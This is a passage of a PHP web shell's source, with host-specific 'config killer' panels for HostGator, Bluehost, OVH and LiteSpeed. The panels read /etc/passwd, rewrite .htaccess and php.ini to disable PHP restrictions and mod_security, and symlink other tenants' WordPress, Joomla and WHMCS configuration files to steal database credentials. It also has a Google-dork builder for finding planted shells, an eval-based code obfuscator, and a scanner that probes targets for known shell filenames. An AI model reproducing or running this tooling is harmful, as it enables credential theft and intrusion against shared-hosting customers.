6980<form method=post><br/><br/>
6981<nobr><b><span class='b7'>[ HOSTGATOR</span> <span class='b8'>TOOLS ]</span></b></nobr><br/><br/>
6982<p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
6983
6984<?php if(isset($_POST['usre'])){ ?>
6985<form method=post>
6986<textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd"); foreach($users as $user){ $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea><br><br>
6987<input type=submit style=color:#FF0000;background-color:#000000 name=su value="./EXECUTE" /></form><br/>
6988<?php } ?>
6989
6990<?php error_reporting(0); if(isset($_POST['su'])){ mkdir('hostgator',0777); $r = "Options +FollowSymLinks \n
6991DirectoryIndex Sux.html \n
6992Options +Indexes \n
6993AddType text/plain .php \n
6994AddHandler server-parsed .php \n
6995AddType text/plain.html "; $g = fopen('hostgator/.htaccess','w'); fwrite($g,$rr); $dm = symlink("/","hostgator/dm.ini"); $rt="<a href=hostgator/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>"; echo "<nobr>[~] "; echo "$rt"; $dir=mkdir('HOSTGATOR',0777); $rr = "Safe_mode = OFF \n
6996Disable_functions = NONE \n
6997Open_basedir = OFF"; $f = fopen('HOSTGATOR/php.ini','w'); fwrite($f,$rr); $rrr = "Options +FollowSymLinks \n
6998DirectoryIndex Sux.html \n
6999Options +Indexes \n
7000AddType text/plain .php \n
7001AddHandler server-parsed .php \n
7002AddType text/plain.html "; $ff = fopen('HOSTGATOR/.htaccess','w'); fwrite($ff,$rrr); $consym="<a href=HOSTGATOR/>
7003<span class='b11'>[ CONFIG KILLER ]</span></b></a>"; echo " [~] "; echo "$consym"; echo " [~]</nobr>"; $usr=explode("\n",$_POST['user']); $configuration=array("wp-config.ini", "wordpress/wp-config.ini", "configuration.ini", "blog/wp-config.ini", "joomla/configuration.ini", "vb/includes/config.ini", "includes/config.ini", "conf_global.ini", "inc/config.ini", "config.ini", "Settings.ini", "sites/default/settings.ini", "whm/configuration.ini", "whmcs/configuration.ini", "support/configuration.ini", "whmc/WHM/configuration.ini", "whm/WHMCS/configuration.ini", "whm/whmcs/configuration.ini", "support/configuration.ini", "clients/configuration.ini", "client/configuration.ini", "clientes/configuration.ini", "cliente/configuration.ini", "clientsupport/configuration.ini", "billing/configuration.ini", "admin/config.ini"); foreach($usr as $uss ){ $us=trim($uss); foreach($configuration as $c){ $rs="/home/".$us."/public_html/".$c; $r="HOSTGATOR/".$us."~".$c; symlink($rs,$r); } } } ?>
7004 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'bluehost')) { ?>
7005 <form action="?y=<?php echo $pwd; ?>&x=bluehost" method="post">
7006 <?php $head = '
7007<html>
7008<head><title>BLUEHOST</title>
7009<meta hxxp-equiv="Content-Type" content="text/html; charset=UTF-8">
7010<script language=\'javascript\'>
7011function hide_div(id){
7012 document.getElementById(id).style.display = \'none\';
7013 document.cookie=id+\'=0;\';
7014}
7015
7016function show_div(id){
7017document.getElementById(id).style.display = \'block\';
7018document.cookie=id+\'=1;\';
7019}
7020
7021function change_divst(id){
7022if (document.getElementById(id).style.display == \'none\')
7023show_div(id);
7024else
7025hide_div(id);
7026}
7027</script>'; ?>
7028<html>
7029<head>
7030<?php echo $head; ?>
7031<body bgcolor=black>
7032<center><br/><br/>
7033<img src="hxxp://www.ananova.com/wp-content/uploads/2013/04/bluehost-review-by-toptenhostings.jpg">
7034<form method=post><br/><br/><nobr><b><span class='b7'>[ BLUEHOST</span> <span class='b8'>TOOLS ]</span></b></nobr><br/><br/>
7035<p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
7036
7037<?php if(isset($_POST['usre'])){ ?>
7038<form method=post>
7039<textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd"); foreach($users as $user){ $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea><br><br>
7040<input type=submit style=color:#FF0000;background-color:#000000 name=su value="./EXECUTE" /></form><br/>
7041<?php } ?>
7042<?php error_reporting(0); echo "<font color=white size=2 face=\"comic sans ms\">"; if(isset($_POST['su'])){ mkdir('bluehost',0777); $rr = "AllowOverride All None \n
7043DirectoryIndex index.html index.htm index.php index.php4 index.php5 \n
7044AddType application/octet-stream .php \n
7045AddHandler server-parsed .php \n
7046Addhandler cgi-script .asp \n
7047AddType ini .php \n
7048AddHandler ini .php"; $g = fopen('bluehost/.htaccess','w'); fwrite($g,$rr); $dm = symlink("/","bluehost/dm.ini"); $rt="<a href=bluehost/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>"; echo "<nobr>[~] "; echo "$rt"; $dir=mkdir('BLUEHOST',0777); $r = "Options all \n DirectoryIndex Sux.html \n
7049AddType text/plain .php \n
7050AddHandler server-parsed .php \n
7051AddType text/plain .html \n
7052AddHandler txt .html \n
7053Require None \n
7054Satisfy Any"; $f = fopen('BLUEHOST/.htaccess','w'); fwrite($f,$r); $consym="<a href=BLUEHOST/><span class='b11'>[ CONFIG KILLER ]</span></b></a>"; echo " [~] "; echo "$consym"; echo " [~]</nobr>"; $usr=explode("\n",$_POST['user']); $configuration=array("wp-config.ini", "wordpress/wp-config.ini", "configuration.ini", "blog/wp-config.ini", "joomla/configuration.ini", "vb/includes/config.ini", "includes/config.ini", "conf_global.ini", "inc/config.ini", "config.ini", "Settings.ini", "sites/default/settings.ini", "whm/configuration.ini", "whmcs/configuration.ini", "support/configuration.ini", "whmc/WHM/configuration.ini", "whm/WHMCS/configuration.ini", "whm/whmcs/configuration.ini", "support/configuration.ini", "clients/configuration.ini", "client/configuration.ini", "clientes/configuration.ini", "cliente/configuration.ini", "clientsupport/configuration.ini", "billing/configuration.ini", "admin/config.ini"); foreach($usr as $uss ){ $us=trim($uss); foreach($configuration as $c){ $rs="/home/".$us."/public_html/".$c; $rs="/home1/".$us."/public_html/".$c; $rs="/home2/".$us."/public_html/".$c; $rs="/home3/".$us."/public_html/".$c; $rs="/home4/".$us."/public_html/".$c; $rs="/home5/".$us."/public_html/".$c; $rs="/home6/".$us."/public_html/".$c; $rs="/home7/".$us."/public_html/".$c; $rs="/home8/".$us."/public_html/".$c; $r="BLUEHOST/".$us."~".$c; symlink($rs,$r); } } } ?>
7055 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'ovh')) { ?>
7056 <form action="?y=<?php echo $pwd; ?>&x=ovh" method="post">
7057 <?php $head = '
7058<html>
7059<head><title>OVH</title>
7060<meta hxxp-equiv="Content-Type" content="text/html; charset=UTF-8">
7061<script language=\'javascript\'>
7062function hide_div(id){
7063 document.getElementById(id).style.display = \'none\';
7064 document.cookie=id+\'=0;\';
7065}
7066
7067function show_div(id){
7068document.getElementById(id).style.display = \'block\';
7069document.cookie=id+\'=1;\';
7070}
7071
7072function change_divst(id){
7073if (document.getElementById(id).style.display == \'none\')
7074show_div(id);
7075else
7076hide_div(id);
7077}
7078</script>'; ?>
7079<html>
7080<head>
7081<?php echo $head; ?>
7082<body bgcolor=black><center><br/><br/><img src="hxxp://alsace-international.eu/IMG/LOGOS/Entreprises/OVH_Logo.gif">
7083<form method=post><br/><br/>
7084<nobr><b><span class='b7'>[ OVH</span> <span class='b8'>TOOLS ]</span></b></nobr><br/><br/>
7085<p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
7086
7087<?php if(isset($_POST['usre'])){ ?>
7088<form method=post>
7089<textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd"); foreach($users as $user){ $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea><br><br>
7090<input type=submit style=color:#FF0000;background-color:#000000 name=su value="./EXECUTE" /></form><br/>
7091<?php } ?>
7092
7093<?php error_reporting(0); if(isset($_POST['su'])){ mkdir('ovh',0777); $r = "AllowOverride All None \n
7094DirectoryIndex index.html index.htm index.php index.php4 index.php5 \n
7095AddType application/octet-stream .php \n
7096AddHandler server-parsed .php \n
7097Addhandler cgi-script .asp \n
7098AddType ini .php \n
7099AddHandler ini .php"; $g = fopen('ovh/.htaccess','w'); fwrite($g,$rr); $dm = symlink("/","ovh/dm.ini"); $rt="<a href=ovh/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>"; echo "<nobr>[~] "; echo "$rt"; $dir=mkdir('OVH',0777); $rr = "Safe_mode = OFF \n
7100Disable_functions = NONE \n
7101Open_basedir = OFF"; $f = fopen('OVH/php.ini','w'); fwrite($f,$rr); $rrr = "AllowOverride All None \n
7102DirectoryIndex index.html index.htm index.php index.php4 index.php5 \n
7103AddType application/octet-stream .php \n
7104AddHandler server-parsed .php \n
7105AddHandler cgi-script .asp \n
7106AddType ini .php \n
7107AddHandler ini .php"; $ff = fopen('OVH/.htaccess','w'); fwrite($ff,$rrr); $consym="<a href=OVH/>
7108<span class='b11'>[ CONFIG KILLER ]</span></b></a>"; echo " [~] "; echo "$consym"; echo " [~]</nobr>"; $usr=explode("\n",$_POST['user']); $configuration=array("wp-config.ini", "wordpress/wp-config.ini", "configuration.ini", "blog/wp-config.ini", "joomla/configuration.ini", "vb/includes/config.ini", "includes/config.ini", "conf_global.ini", "inc/config.ini", "config.ini", "Settings.ini", "sites/default/settings.ini", "whm/configuration.ini", "whmcs/configuration.ini", "support/configuration.ini", "whmc/WHM/configuration.ini", "whm/WHMCS/configuration.ini", "whm/whmcs/configuration.ini", "support/configuration.ini", "clients/configuration.ini", "client/configuration.ini", "clientes/configuration.ini", "cliente/configuration.ini", "clientsupport/configuration.ini", "billing/configuration.ini", "admin/config.ini"); foreach($usr as $uss ){ $us=trim($uss); foreach($configuration as $c){ $rs="/homez.0/".$us."/www/".$c; $rs="/homez.1/".$us."/www/".$c; $rs="/homez.2/".$us."/www/".$c; $rs="/homez.3/".$us."/www/".$c; $rs="/homez.4/".$us."/www/".$c; $rs="/homez.5/".$us."/www/".$c; $rs="/homez.6/".$us."/www/".$c; $rs="/homez.7/".$us."/www/".$c; $rs="/homez.8/".$us."/www/".$c; $rs="/homez.9/".$us."/www/".$c; $rs="/homez.10/".$us."/www/".$c; $rs="/homez.11/".$us."/www/".$c; $rs="/homez.12/".$us."/www/".$c; $rs="/homez.13/".$us."/www/".$c; $rs="/homez.14/".$us."/www/".$c; $rs="/homez.15/".$us."/www/".$c; $rs="/homez.16/".$us."/www/".$c; $rs="/homez.17/".$us."/www/".$c; $rs="/homez.18/".$us."/www/".$c; $rs="/homez.19/".$us."/www/".$c; $rs="/homez.20/".$us."/www/".$c; $rs="/homez.21/".$us."/www/".$c; $rs="/homez.22/".$us."/www/".$c; $rs="/homez.23/".$us."/www/".$c; $rs="/homez.24/".$us."/www/".$c; $rs="/homez.25/".$us."/www/".$c; $rs="/homez.26/".$us."/www/".$c; $rs="/homez.27/".$us."/www/".$c; $rs="/homez.28/".$us."/www/".$c; $rs="/homez.29/".$us."/www/".$c; $rs="/homez.30/".$us."/www/".$c; $rs="/homez.31/".$us."/www/".$c; $rs="/homez.32/".$us."/www/".$c; $rs="/homez.33/".$us."/www/".$c; $rs="/homez.34/".$us."/www/".$c; $rs="/homez.35/".$us."/www/".$c; $rs="/homez.36/".$us."/www/".$c; $rs="/homez.37/".$us."/www/".$c; $rs="/homez.38/".$us."/www/".$c; $rs="/homez.39/".$us."/www/".$c; $rs="/homez.40/".$us."/www/".$c; $rs="/homez.41/".$us."/www/".$c; $rs="/homez.42/".$us."/www/".$c; $rs="/homez.43/".$us."/www/".$c; $rs="/homez.44/".$us."/www/".$c; $rs="/homez.45/".$us."/www/".$c; $rs="/homez.46/".$us."/www/".$c; $rs="/homez.47/".$us."/www/".$c; $rs="/homez.48/".$us."/www/".$c; $rs="/homez.49/".$us."/www/".$c; $rs="/homez.50/".$us."/www/".$c; $rs="/homez.51/".$us."/www/".$c; $rs="/homez.52/".$us."/www/".$c; $rs="/homez.53/".$us."/www/".$c; $rs="/homez.54/".$us."/www/".$c; $rs="/homez.55/".$us."/www/".$c; $rs="/homez.56/".$us."/www/".$c; $rs="/homez.57/".$us."/www/".$c; $rs="/homez.58/".$us."/www/".$c; $rs="/homez.59/".$us."/www/".$c; $rs="/homez.60/".$us."/www/".$c; $rs="/homez.61/".$us."/www/".$c; $rs="/homez.62/".$us."/www/".$c; $rs="/homez.63/".$us."/www/".$c; $rs="/homez.64/".$us."/www/".$c; $rs="/homez.65/".$us."/www/".$c; $rs="/homez.66/".$us."/www/".$c; $rs="/homez.67/".$us."/www/".$c; $rs="/homez.68/".$us."/www/".$c; $rs="/homez.69/".$us."/www/".$c; $rs="/homez.70/".$us."/www/".$c; $rs="/homez.71/".$us."/www/".$c; $rs="/homez.72/".$us."/www/".$c; $rs="/homez.73/".$us."/www/".$c; $rs="/homez.74/".$us."/www/".$c; $rs="/homez.75/".$us."/www/".$c; $rs="/homez.76/".$us."/www/".$c; $rs="/homez.77/".$us."/www/".$c; $rs="/homez.78/".$us."/www/".$c; $rs="/homez.79/".$us."/www/".$c; $rs="/homez.80/".$us."/www/".$c; $rs="/homez.81/".$us."/www/".$c; $rs="/homez.82/".$us."/www/".$c; $rs="/homez.83/".$us."/www/".$c; $rs="/homez.84/".$us."/www/".$c; $rs="/homez.85/".$us."/www/".$c; $rs="/homez.86/".$us."/www/".$c; $rs="/homez.87/".$us."/www/".$c; $rs="/homez.88/".$us."/www/".$c; $rs="/homez.89/".$us."/www/".$c; $rs="/homez.100/".$us."/www/".$c; $rs="/homez.101/".$us."/www/".$c; $rs="/homez.102/".$us."/www/".$c; $rs="/homez.103/".$us."/www/".$c; $rs="/homez.104/".$us."/www/".$c; $rs="/homez.105/".$us."/www/".$c; $rs="/homez.106/".$us."/www/".$c; $rs="/homez.107/".$us."/www/".$c; $rs="/homez.108/".$us."/www/".$c; $rs="/homez.109/".$us."/www/".$c; $rs="/homez.110/".$us."/www/".$c; $rs="/homez.111/".$us."/www/".$c; $rs="/homez.112/".$us."/www/".$c; $rs="/homez.113/".$us."/www/".$c; $rs="/homez.114/".$us."/www/".$c; $rs="/homez.115/".$us."/www/".$c; $rs="/homez.116/".$us."/www/".$c; $rs="/homez.117/".$us."/www/".$c; $rs="/homez.118/".$us."/www/".$c; $rs="/homez.119/".$us."/www/".$c; $rs="/homez.120/".$us."/www/".$c; $rs="/homez.121/".$us."/www/".$c; $rs="/homez.122/".$us."/www/".$c; $rs="/homez.123/".$us."/www/".$c; $rs="/homez.124/".$us."/www/".$c; $rs="/homez.125/".$us."/www/".$c; $rs="/homez.126/".$us."/www/".$c; $rs="/homez.127/".$us."/www/".$c; $rs="/homez.128/".$us."/www/".$c; $rs="/homez.129/".$us."/www/".$c; $rs="/homez.130/".$us."/www/".$c; $r="OVH/".$us."~".$c; symlink($rs,$r); } } } ?>
7109 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'litespeed')) { ?>
7110 <form action="?y=<?php echo $pwd; ?>&x=litespeed" method="post">
7111 <?php $head = '
7112<html>
7113<head>
7114</script>
7115<title>LITESPEED - APACHE</title>
7116<meta hxxp-equiv="Content-Type" content="text/html; charset=UTF-8">
7117<script language=\'javascript\'>
7118function hide_div(id)
7119{
7120 document.getElementById(id).style.display = \'none\';
7121 document.cookie=id+\'=0;\';
7122}
7123function show_div(id)
7124{
7125 document.getElementById(id).style.display = \'block\';
7126 document.cookie=id+\'=1;\';
7127}
7128function change_divst(id)
7129{
7130if (document.getElementById(id).style.display == \'none\')
7131show_div(id);
7132else
7133hide_div(id);
7134}
7135</script>'; ?>
7136<html>
7137<head>
7138<?php echo $head; ?>
7139<body bgcolor=black><center><br/><br/> <img src="hxxp://www.ftt.co.uk/images/nginx.png"><br/><img src="hxxp://www.litespeedtech.com/images/litespeed/Subpage_misc/LSWS_logo.png">
7140<form method=post><br/><br/>
7141<nobr><b><span class='b7'>[ LITESPEED - NGINX</span> <span class='b8'>TOOLS ]</span></b></nobr><br/><br/>
7142<p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
7143
7144<?php if(isset($_POST['usre'])){ ?>
7145<form method=post>
7146<textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea><br><br>
7147<input type=submit style=color:#FF0000;background-color:#000000 name=su value="EXECUTE" /></form><br/>
7148<?php } ?>
7149
7150<?php error_reporting(0); if(isset($_POST['su'])){ mkdir('litespeed',0777); $rr = "Options +FollowSymlinks \r
7151Options +IncludesNoExec -ExecCGI \r
7152DirectoryIndex index.html index.shtml index.htm index.php \r
7153RemoveHandler .php \r
7154AddType text/html .shtml \r
7155AddType application/octet-stream .php \r
7156AddHandler server-parsed .shtml"; $g = fopen('litespeed/.htaccess','w'); fwrite($g,$rr); $dm = symlink("/","litespeed/dm.shtml"); $rt="<a href=litespeed/dm.shtml><b><span class='b11'>[ SYMLINK ]</span></b></a>"; echo "<nobr>[~] "; echo "$rt"; $dir=mkdir('LITESPEED',0777); $r = "Options +FollowSymlinks \r
7157Options +IncludesNoExec -ExecCGI \r
7158DirectoryIndex index.html index.shtml index.htm index.php \r
7159RemoveHandler .php \r
7160AddType text/html .shtml \r
7161AddType application/octet-stream .php \r
7162 AddHandler server-parsed .shtml"; $f = fopen('LITESPEED/.htaccess','w'); fwrite($f,$r); $consym="<a href=LITESPEED/><b><span class='b11'>[ CONFIG KILLER ]</span></b> </a>"; echo " [~] "; echo "$consym"; echo " [~]</nobr>"; $usr=explode("\n",$_POST['user']); $configuration=array( "aksi.php", "aksi.php.old", "aksi.php.bak", "conf.php", "conf.php.old", "conf.php.bak", "conf_global.php", "conf_global.php.old", "conf_global.php.bak", "config.php", "config.php.old", "config.php.bak", "configuration.php", "configuration.php.old", "configuration.php.bak", "conn.php", "conn.php.old", "conn.php.bak", "connect.php", "connect.php.old", "connect.php.bak", "connection.php", "connection.php.old", "connection.php.bak", "db.php", "db.php.old", "db.php.bak", "database.php", "database.php.old", "database.php.bak", "inc.php", "inc.php.old", "inc.php.bak", "koneksi.php", "koneksi.php.old", "koneksi.php.bak", "mysql.php", "myqsl.php.old", "mysql.php.bak", "setting.php", "setting.php.old", "setting.php.bak", "Settings.php", "Settings.php.old", "Settings.php.bak", "sql.php", "sql.php.old", "sql.php.bak"); foreach($usr as $uss ){ $us=trim($uss); foreach($configuration as $c){ $rs="/home/".$us."/public_html/".$c; $r="LITESPEED/".$us."~".$c; symlink($rs,$r); } } } ?>
7163 <?php } else if(isset($_GET['gdork'])) { if( isset($_GET['title']) || isset($_GET['text']) || isset($_GET['url']) || isset($_GET['site']) ) { $title = $_GET['title']; $text = $_GET['text']; $url = $_GET['url']; $site = $_GET['site']; if($title != "") { $title = " intitle:\"".$title."\" "; } if($text != "") { $text = " intext:\"".$text."\" "; } if($url != "") { $url = " inurl:\"".$url."\" "; } if($site != "") { $site = " site:\"".$site."\" "; } ?>
7164 <div align="center">
7165 <form action="hxxp://google.com" method="GET">
7166 <input style="color:#000000" class="cmd" style="border: solid red 1px;" name="q" value='<?php echo $title.$text.$url.$site ?>' /><br />
7167 <input style="color:#000000" type="submit" style="Padding:5px;" class="own" value='Google It! ;)' />
7168 </form>
7169 </div>
7170 <?php } else { ?>
7171 <p align="center" style="color:red;">Note : Any one of the following options is compulsory to be filled rest can be left blank.</p>
7172 <center><table id="margins" >
7173 <tr>
7174 <form method='GET'>
7175 <input style="color:#000000" type="hidden" name="gdork" />
7176 <tr>
7177 <td width="100" class="title">
7178 intitle
7179 </td>
7180 <td>
7181 <input style="color:#000000" class="cmd" name="title" value="uploader by ghozt dz"/>
7182 </td>
7183 </tr>
7184 <tr>
7185 <td class="title">
7186 intext
7187 </td>
7188 <td>
7189 <input style="color:#000000" class="cmd" name="text" value="Linux" />
7190 </td>
7191 </tr>
7192 <tr>
7193 <td width="100" class="title">
7194 inurl
7195 </td>
7196 <td>
7197 <input style="color:#000000" class="cmd" name="url" value="images/stories/3xp.php"/>
7198 </td>
7199 </tr>
7200 <tr>
7201 <td width="100" class="title">
7202 site
7203 </td>
7204 <td>
7205 <input style="color:#000000" class="cmd" name="site" value="*.com"/>
7206 </td>
7207 </tr>
7208 <tr>
7209 <td rowspan="2" >
7210 <input style="color:#000000" style="margin : 20px; margin-left: 390px; padding : 10px;" type="submit" class="own" value="Croot the Dork!"/>
7211 </td>
7212 </tr>
7213 </form>
7214 </table></center>
7215 <?php } } else if(isset($_GET['obfuscate'])) { if ( isset($_POST['code']) && $_POST['code'] != '') { $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),'<?php,?>'),9)); $encode = '
7216<?php
7217$encoded = \''.$encoded.'\';
7218eval(gzinflate(base64_decode($encoded)));
7219// Script Encoded by ROOTACTIVE
7220?>
7221'; } else { $encode = 'Please Enter your Code! and Click Submit! :)'; }?>
7222 <center><form method="POST">
7223 <textarea style="color:#000000" class="cmd" cols="100" rows="20" name="code"><?php echo $encode;?></textarea><br />
7224 <input style="color:#000000;margin: 20px; margin-left: 50px; padding: 10px;" class="own" type="submit" value="Encode :D"/>
7225 </form></center>
7226
7227 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'ppcheck')) { ?>
7228 <form action="?y=<?php echo $pwd; ?>&x=ppcheck" method="post">
7229 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://rubiq.co.za/administrator/pp.php" width="100%"></iframe>
7230 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'schoolhos')) { ?>
7231 <form action="?y=<?php echo $pwd; ?>&x=schoolhos" method="post">
7232 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://rubiq.co.za/administrator/shost.php" width="100%"></iframe>
7233 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'music')) { ?>
7234 <form action="?y=<?php echo $pwd; ?>&x=music" method="post">
7235 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://divine-music.info/musicfiles/" width="100%"></iframe>
7236 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'dork')) { ?>
7237 <form action="?y=<?php echo $pwd; ?>&x=dork" method="post">
7238 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://rubiq.co.za/administrator/dork.txt" width="100%"></iframe>
7239 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shellscan')) { ?>
7240 <form action="?y=<?php echo $pwd; ?>&x=shellscan" method="post">
7241 <center><br /><br />
7242<table><form method='POST'>
7243<tr><td>URL TARGET : <input size=40 style='color:#FF0000;background-color:#000000' name='rem_web' value='hxxp://'></td></tr>
7244<tr><td><font color=red>INPUT NAMA FILE / SHELL</font></tr></td>
7245<tr><td><textarea spellcheck='false' class='textarea_edit' style='color:#FF0000;background-color:#000000' cols=50 rows=30 name='tryzzz'>
7246b374k-2.7.php
7247WSO-2.7.php
7248WSO.php
7249dz.php
7250cpanelcracker.php
7251blackshadow.php
7252sym.php
7253ftpcracker.php
7254cpanel.php
7255cpn.php
7256sql.php
7257mysql.php
7258madspot.php
7259itsecteam_shell.php
7260b374k.php
7261madsopot.php
7262indishell.php
7263Cgishell.pl
7264killer.php
7265changeall.php
72662.php
7267Sh3ll.php
7268dz0.php
7269dam.php
7270user.php
7271dom.php
7272whmcs.php
7273r00t.php
7274c99.php
7275gaza.php
7276q.php
72771.php
7278d0mains.php
7279madspotshell.php
7280Sym.php
7281c22.php
7282c100.php
7283Cpanel.php
7284zone-h.php
7285cp.php
7286L3b.php
7287d.php
7288admin1.php
7289upload.php
7290up.php
7291uploads.php
7292sa.php
7293r57.php
7294shell.php
7295sa.php
7296</textarea></td></tr>
7297<tr><td><br /><input type='submit' style='color:#FF0000;background-color:#000000' value=' >> SCAN >> ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />
7298
7299<?php set_time_limit(0); $rtr=array(); echo "<div id=result><center><table>"; $webz=$_POST['rem_web']; $uri_in=$_POST['tryzzz']; $r_xuri = trim($uri_in); $r_xuri=explode("\n", $r_xuri); foreach($r_xuri as $rty) { $urlzzx=$webz.$rty; if(function_exists('curl_init')) { echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>"; $ch = curl_init($urlzzx); curl_setopt($ch, CURLOPT_NOBODY, true); curl_exec($ch); $status_code=curl_getinfo($ch, CURLINFO_hxxp_CODE); curl_close($ch); if($status_code==200) { echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>"; } else { echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>"; } } else { echo "<font color=red>cURL Not Found </font>"; } } echo "</table><br /><br /><hr /><br /><br /></div>"; ?>
7300 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'security')) { ?>
7301 <form action="?y=<?php echo $pwd; ?>&x=security" method="post">
7302 <?php echo "<html>
7303<center><br><br><font color=#FF0000 >[+] GENERATED php.ini [+]</font><br>
7304<form method='POST' >
7305<font color=#FF0000 > PATH : </font><input type='text' name='phpinisafemode' value='$pwd' style='color:#FF0000;background-color:#000000' />
7306<input type='submit' name='dsmsubmit' style='color:#FF0000;background-color:#000000' value=' >> ' />
7307</form>
7308<br><br>
7309<font color=#FF0000 >[+] GENERATED Htaccess [+}</font><br>
7310<form method='POST' >
7311<font color=#FF0000 > PATH : </font><input type='text' name='htaccesssafemode' style='color:#FF0000;background-color:#000000' value='$pwd' />
7312<input type='submit' name='omssubmit' style='color:#FF0000;background-color:#000000' value=' >> ' />
7313</form>"; $dirphpini = $_POST['phpinisafemode']; $dirhtaccess = $_POST['htaccesssafemode']; $phpininamelol = "php.ini"; if($_POST['omssubmit']) { $fse=fopen("$dirphpini.htaccess","w"); fwrite($fse,'<IfModule mod_security.c>
7314Sec------Engine Off
7315Sec------ScanPOST Off
7316</IfModule>'); fclose($fse); } else if ($_POST['dsmsubmit']) { $fse=fopen("$dirhtaccess$phpininamelol","w"); fwrite($fse,'safe_mode = OFF
7317disable_functions = NONE
7318safe_mode_gid = OFF
7319open_basedir = OFF
7320register_globals = ON
7321exec = ON
7322shell_exec = ON'); fclose($fse); } } elseif(isset($_GET['x']) && ($_GET['x'] == 'systemview')) { ?>
7323 <form action="?y=<?php echo $pwd; ?>&x=systemview" method="post">
7324 <?php function processc99() { if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} else {$handler = "tasklist";} $ret = myshellexec($handler); if (!$ret) {echo "Can't execute \"".$handler."\"!";} else { if (empty($processes_sort)) {$processes_sort = $sort_default;} $parsesort = parsesort($processes_sort); if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} $k = $parsesort[0]; $ret = htmlspecialchars($ret); if (!$win) { if ($pid) { if (is_null($sig)) {$sig = 9;} echo "Sending signal ".$sig." to #".$pid."... "; if (posix_kill($pid,$sig)) {echo "OK.";} else {echo "ERROR.";} } while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} $stack = explode("\n",$ret); $head = explode(" ",$stack[0]); unset($stack[0]); $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { echo "<tr>"; $line = explode(" ",$line); $line[10] = join(" ",array_slice($line,10)); $line = array_slice($line,0,11); $prcs[] = $line; echo "</tr>"; } } } else { while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg("",$ret)) {$ret = str_replace("","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} $ret = convert_cyr_string($ret,"d","w"); $stack = explode("\n",$ret); unset($stack[0],$stack[2]); $stack = array_values($stack); $head = explode("",$stack[0]); $head[1] = explode(" ",$head[1]); $head[1] = $head[1][0]; $stack = array_slice($stack,1); unset($head[2]); $head = array_values($head); if ($k > count($head)) {$k = count($head)-1;} $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { echo "<tr>"; $line = explode("",$line); $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); $line[2] = intval(str_replace(" ","",$line[2]))*1024; $prcs[] = $line; echo "</tr>"; } } } $head[$k] = "<b>".$head[$k]."</b>".$y; $v = $processes_sort[0]; if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} $tab = array(); $tab[] = $head; $tab = array_merge($tab,$prcs); echo "<TABLE height=1 cellSpacing=0 cellPadding=5 width=\"100%\" border=1>"; foreach($tab as $i=>$k) { echo "<tr>"; foreach($k as $j=>$v) { if ($win and $i > 0 and $j == 2) { $v = view_size($v); } echo "<td>".$v."</td>";} echo "</tr>"; } echo "</table>"; } } echo "<center><br><br>"; if($win) { echo "<form method='post'>
7325 <select class='inputz' name='windowsprocess'>
7326 <option name='systeminfo'>System Info</option>
7327 <option name='active'>Active Connections</option>
7328 <option name='runningserv'>Running Services</option>
7329 <option name='useracc'>User Accounts</option>
7330 <option name='showcom'>Show Computers</option>
7331 <option name='arptab'>ARP Table</option>
7332 <option name='ipconf'>IP Configuration</option>
7333 </select>
7334 <input type='submit' class='inputzbut' name='submitwinprocess' value='View'>
7335 </form>
7336 "; } else { echo "<form method='post'>
7337 <select class='inputz' name='nonwindowsprocess'>
